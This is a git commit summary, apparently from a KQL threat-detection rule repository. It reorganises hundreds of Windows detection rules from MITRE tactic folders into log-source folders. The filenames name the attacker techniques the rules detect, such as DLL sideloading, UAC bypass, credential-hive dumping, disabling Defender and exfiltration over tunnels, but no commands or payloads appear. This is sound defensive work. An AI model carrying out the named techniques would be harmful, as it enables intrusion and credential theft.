KQL/rules/{Defense Evasion => windows/image_load}/potential_7za_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_antivirus_software_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_appverifui_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_avkkid_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_azure_browser_sso_abuse.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_ccleanerdu_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_ccleanerreactivator_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_chrome_frame_helper_dll_sideloading.kql (100%) rename KQL/rules/{Lateral Movement => windows/image_load}/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_dll_sideloading_of_dbgcore_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_dll_sideloading_of_dbghelp_dll.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/potential_dll_sideloading_of_dbgmodel_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/potential_dll_sideloading_of_mpsvc_dll.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/potential_dll_sideloading_of_mscorsvc_dll.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/potential_dll_sideloading_using_coregen_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_dll_sideloading_via_classicexplorer32_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_dll_sideloading_via_comctl32_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_dll_sideloading_via_jsschhlp.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/potential_dll_sideloading_via_vmware_xfer.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_eacore_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_edputil_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_goopdate_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_iviewers_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_libvlc_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_mfdetours_dll_sideloading.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/potential_mpclient_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_rcdll_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_rjvplatform_dll_sideloading_from_default_location.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_rjvplatform_dll_sideloading_from_non_default_location.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_roboform_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_shelldispatch_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_smadhook_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_solidpdfcreator_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_system_dll_sideloading_from_non_system_locations.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_vivaldi_elf_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_waveedit_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potential_wazuh_security_platform_dll_sideloading.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/potential_wwlib_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql (100%) rename KQL/rules/{Execution => windows/image_load}/powershell_core_dll_loaded_by_non_powershell_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/powershell_core_dll_loaded_via_office_application.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/python_image_load_by_non_python_process.kql (100%) rename KQL/rules/{Execution => windows/image_load}/remote_dll_load_via_rundll32_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/suspicious_volume_shadow_copy_vss_ps_dll_load.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/suspicious_volume_shadow_copy_vssapi_dll_load.kql (100%) rename KQL/rules/{Execution => windows/image_load}/suspicious_wsman_provider_image_loads.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/system_control_panel_item_loaded_from_uncommon_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/third_party_software_dll_sideloading.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/time_travel_debugging_utility_usage_image.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/trusted_path_bypass_via_windows_directory_spoofing.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/uac_bypass_using_iscsicpl_imageload.kql (100%) rename KQL/rules/{Persistence => windows/image_load}/uac_bypass_with_fake_dll.kql (100%) rename KQL/rules/{Execution => windows/image_load}/vba_dll_loaded_via_office_application.kql (100%) rename KQL/rules/{Lateral Movement => windows/image_load}/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql (100%) rename KQL/rules/{Privilege Escalation => windows/image_load}/wmi_persistence_command_line_event_consumer.kql (100%) rename KQL/rules/{Defense Evasion => windows/image_load}/wmic_loading_scripting_libraries.kql (100%) rename KQL/rules/{Execution => windows/image_load}/wmiprvse_wbemcomn_dll_hijack.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/communication_to_localtonet_tunneling_service_initiated.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/communication_to_ngrok_tunneling_service_initiated.kql (100%) rename KQL/rules/{Persistence => windows/network_connection}/communication_to_uncommon_destination_ports.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/local_network_connection_initiated_by_script_interpreter.kql (100%) rename KQL/rules/{Privilege Escalation => windows/network_connection}/microsoft_sync_center_suspicious_network_connections.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/network_communication_initiated_to_portmap_io_domain.kql (100%) rename KQL/rules/{Impact => windows/network_connection}/network_communication_with_crypto_mining_pool.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/network_connection_initiated_by_addinutil_exe.kql (100%) rename KQL/rules/{Execution => windows/network_connection}/network_connection_initiated_by_eqnedt32_exe.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/network_connection_initiated_by_imewdbld_exe.kql (100%) rename KQL/rules/{Execution => windows/network_connection}/network_connection_initiated_by_regsvr32_exe.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/network_connection_initiated_to_btunnels_domains.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/network_connection_initiated_to_cloudflared_tunnels_domains.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/network_connection_initiated_to_devtunnels_domain.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/network_connection_initiated_to_mega_nz.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql (100%) create mode 100644 KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql rename KQL/rules/{Privilege Escalation => windows/network_connection}/network_connection_initiated_via_notepad_exe.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/office_application_initiated_network_connection_over_uncommon_ports.kql (100%) rename KQL/rules/{Execution => windows/network_connection}/office_application_initiated_network_connection_to_non_local_ip.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/outbound_network_connection_initiated_by_cmstp_exe.kql (100%) rename KQL/rules/{Execution => windows/network_connection}/outbound_network_connection_initiated_by_microsoft_dialer.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/outbound_network_connection_initiated_by_script_interpreter.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/outbound_network_connection_to_public_ip_via_winlogon.kql (100%) rename KQL/rules/{Lateral Movement => windows/network_connection}/outbound_rdp_connections_over_non_standard_tools.kql (100%) rename KQL/rules/{Persistence => windows/network_connection}/potentially_suspicious_malware_callback_communication.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/potentially_suspicious_network_connection_to_notion_api.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/potentially_suspicious_wuauclt_network_connection.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/process_initiated_network_connection_to_ngrok_domain.kql (100%) rename KQL/rules/{Discovery => windows/network_connection}/python_initiated_connection.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/rdp_over_reverse_ssh_tunnel.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/rdp_to_http_or_https_target_ports.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/regasm_exe_initiating_network_connection_to_public_ip.kql (100%) rename KQL/rules/{Persistence => windows/network_connection}/remote_access_tool_anydesk_incoming_connection.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/rundll32_internet_connection.kql (100%) rename KQL/rules/{Execution => windows/network_connection}/silenttrinity_stager_msbuild_activity.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/suspicious_dropbox_api_usage.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/suspicious_network_connection_binary_no_commandline.kql (100%) rename KQL/rules/{Discovery => windows/network_connection}/suspicious_network_connection_to_ip_lookup_service_apis.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/suspicious_non_browser_network_communication_with_google_api.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/suspicious_non_browser_network_communication_with_telegram_api.kql (100%) rename KQL/rules/{Exfiltration => windows/network_connection}/suspicious_outbound_smtp_connections.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/suspicious_wordpad_outbound_connections.kql (100%) rename KQL/rules/{Discovery => windows/network_connection}/uncommon_connection_to_active_directory_web_services.kql (100%) rename KQL/rules/{Command and Control => windows/network_connection}/uncommon_network_connection_initiated_by_certutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/network_connection}/uncommon_outbound_kerberos_connection.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/7zip_compressing_dump_files.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/aadinternals_powershell_cmdlets_execution_proccesscreation.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/abuse_of_service_permissions_to_hide_services_via_set_service.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/abused_debug_privilege_by_arbitrary_parent_processes.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/abusing_print_executable.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/active_directory_database_snapshot_via_adexplorer.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/active_directory_structure_export_via_csvde_exe.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/active_directory_structure_export_via_ldifde_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/add_insecure_download_source_to_winget.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/add_new_download_source_to_winget.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/add_potential_suspicious_new_download_source_to_winget.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/add_safeboot_keys_via_reg_utility.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/add_windows_capability_via_powershell_cmdlet.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/addinutil_exe_execution_from_uncommon_directory.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/agentexecutor_powershell_execution.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/all_backups_deleted_via_wbadmin_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/always_install_elevated_msi_spawned_cmd_and_powershell.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/always_install_elevated_windows_installer.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/application_removed_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/application_terminated_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/arbitrary_binary_execution_using_gup_utility.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/arbitrary_file_download_via_configsecuritypolicy_exe.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_file_download_via_imewdbld_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_file_download_via_msedge_proxy_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_file_download_via_msohtmed_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_file_download_via_mspub_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_file_download_via_presentationhost_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/arbitrary_file_download_via_squirrel_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/arbitrary_msi_download_via_devinit_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/arbitrary_shell_command_execution_via_settingcontent_ms.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/aspnetcompiler_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/assembly_loading_via_cl_loadassembly_ps1.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/audio_capture_via_powershell.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/audio_capture_via_soundrecorder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/audit_policy_tampering_via_auditpol.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/audit_policy_tampering_via_nt_resource_kit_auditpol.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/automated_collection_command_prompt.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/base64_encoded_powershell_command_detected.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/base64_mz_header_in_commandline.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/binary_proxy_execution_via_dotnet_trace_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/bitlockertogo_exe_execution.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/boot_configuration_tampering_via_bcdedit_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/browser_execution_in_headless_mode.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/browser_started_with_remote_debugging.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/bypass_uac_via_cmstp.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/bypass_uac_via_fodhelper_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/bypass_uac_via_wsreset_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/c_il_code_compilation_via_ilasm_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/capture_credentials_with_rpcping_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/certificate_exported_via_certutil_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/certificate_exported_via_powershell.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/change_default_file_association_to_executable_via_assoc.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/change_default_file_association_via_assoc.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/change_powershell_policies_to_an_insecure_level.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/changing_existing_service_imagepath_value_via_reg_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/chopper_webshell_process_pattern.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/chromium_browser_headless_execution_to_mockbin_like_site.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/chromium_browser_instance_executed_with_custom_extension.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/cloudflared_portable_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/cloudflared_quick_tunnel_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/cloudflared_tunnel_connections_cleanup.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/cloudflared_tunnel_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/cmd_exe_missing_space_characters_execution_anomaly.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/cmstp_execution_process_creation.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/cmstp_uac_bypass_via_com_object_access.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/cobaltstrike_load_by_rundll32.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/code_execution_via_pcwutl_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/codepage_modification_via_mode_com_to_russian_language.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/com_object_execution_via_xwizard_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/command_line_execution_with_suspicious_url_and_appdata_strings.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/compressed_file_creation_via_tar_exe.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/compressed_file_extraction_via_tar_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/computer_password_change_via_ksetup_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/computer_system_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/conhost_exe_commandline_path_traversal.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/conhost_spawned_by_uncommon_parent_process.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/console_codepage_lookup_via_chcp.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/control_panel_items.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/convertto_securestring_cmdlet_usage_via_commandline.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/copy_from_or_to_admin_share_or_sysvol_folder.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/copy_from_volumeshadowcopy_via_cmd_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/copying_sensitive_files_with_credential_data.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/createdump_process_dump.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/csc_exe_execution_form_potentially_suspicious_parent.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/cscript_wscript_potentially_suspicious_child_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/cscript_wscript_uncommon_script_extension_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/curl_download_and_execute_combination.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/curl_web_request_with_potential_custom_user_agent.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/data_copied_to_clipboard_via_clip_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/data_export_from_mssql_table_via_bcp_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/delete_all_scheduled_tasks.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/delete_important_scheduled_task.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/deleted_data_overwritten_via_cipher_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/detected_windows_software_discovery.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/detection_of_powershell_execution_via_sqlps_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/devicecredentialdeployment_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/devtoolslauncher_exe_executes_specified_binary.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/direct_autorun_keys_modification.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/directory_removal_via_rmdir.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/dirlister_execution.kql (92%) rename KQL/rules/{Impact => windows/process_creation}/disable_important_scheduled_task.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/disable_windows_defender_av_security_monitoring.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/disable_windows_iis_http_logging.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/disabled_ie_security_features.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/disabled_volume_snapshots.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/discovery_of_a_system_time.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/diskshadow_script_mode_execution_from_potential_suspicious_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/diskshadow_script_mode_uncommon_script_extension_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/dism_remove_online_package.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/dll_execution_via_rasautou_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/dll_execution_via_register_cimprovider_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/dll_loaded_via_certoc_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/dll_sideloading_by_vmware_xfer_utility.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/dllhost_exe_execution_anomaly.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/dllunregisterserver_function_call_via_msiexec_exe.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/dns_exfiltration_and_tunneling_tools_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/domain_trust_discovery_via_dsquery.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/driver_dll_installation_via_odbcconf_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/driverquery_exe_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/dropping_of_password_filter_dll.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/dsinternals_suspicious_powershell_cmdlets.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/dumping_of_sensitive_hives_via_reg_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/dumping_process_via_sqldumper_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/dumpminitool_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/dumpstack_log_defender_evasion.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/dynamic_net_compilation_via_csc_exe.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/email_exifiltration_via_powershell.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/enable_lm_hash_storage_proccreation.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/enumerate_all_information_with_whoami_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/enumeration_for_3rd_party_creds_from_cli.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/enumeration_for_credentials_in_registry.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/esentutl_gather_credentials.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/esentutl_steals_browser_information.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/etw_logging_tamper_in_net_processes_via_commandline.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/etw_trace_evasion_activity.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/exchange_powershell_snap_ins_usage.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/execute_code_with_pester_bat.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/execute_code_with_pester_bat_as_parent.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/execute_files_with_msdeploy_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/execute_from_alternate_data_streams.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/execute_pcwrun_exe_to_leverage_follina.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/execution_of_non_existing_file.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/execution_of_powershell_script_in_public_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/execution_of_suspicious_file_type_extension.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/execution_via_stordiag_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/execution_via_workfolders_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/explorer_nouaccheck_flag.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/explorer_process_tree_break.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/exports_critical_registry_keys_to_a_file.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/exports_registry_key_to_a_file.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/file_and_subfolder_enumeration_via_dir_command.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_decoded_from_base64_hex_via_certutil_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/file_decryption_using_gpg4win.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_deletion_via_del.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/file_download_and_execution_via_ieexec_exe.kql (100%) create mode 100644 KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql rename KQL/rules/{Command and Control => windows/process_creation}/file_download_from_ip_based_url_via_certoc_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/file_download_from_ip_url_via_curl_exe.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/file_download_using_notepad_gup_utility.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_using_protocolhandler_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_via_bitsadmin.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/file_download_via_certoc_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_via_installutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_via_windows_defender_mpcmprun_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_download_with_headless_browser.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_encoded_to_base64_via_certutil_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/file_encryption_using_gpg4win.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/file_recovery_from_backup_via_wbadmin_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/file_with_suspicious_extension_downloaded_via_bitsadmin.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/files_added_to_an_archive_using_rar_exe.kql (100%) rename KQL/rules/{Defense Evasion => 